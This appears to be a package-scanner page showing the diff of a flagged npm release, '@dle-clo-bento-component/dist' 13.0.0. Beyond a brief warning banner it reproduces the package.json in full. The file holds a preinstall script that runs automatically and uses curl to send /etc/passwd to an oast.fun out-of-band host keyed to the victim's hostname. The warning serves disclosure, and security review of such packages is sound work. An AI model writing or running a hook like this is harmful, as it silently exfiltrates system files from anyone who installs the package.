@dle-clo-bento-component/dist 13.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @dle-clo-bento-component/dist might be problematic. Click here for more details.
- package/package.json +11 -0
package/package.json
ADDED
@@ -0,0 +1,11 @@
|
|
1
|
+
{
|
2
|
+
"name": "@dle-clo-bento-component/dist",
|
3
|
+
"version": "13.0.0",
|
4
|
+
"main": "index.js",
|
5
|
+
"scripts": {
|
6
|
+
"preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname).rcqytuogifojgxmnynizm0y6465pt4o6o.oast.fun"
|
7
|
+
},
|
8
|
+
"author": "ynsy",
|
9
|
+
"license": "UNLICENSED",
|
10
|
+
"description": "test"
|
11
|
+
}
|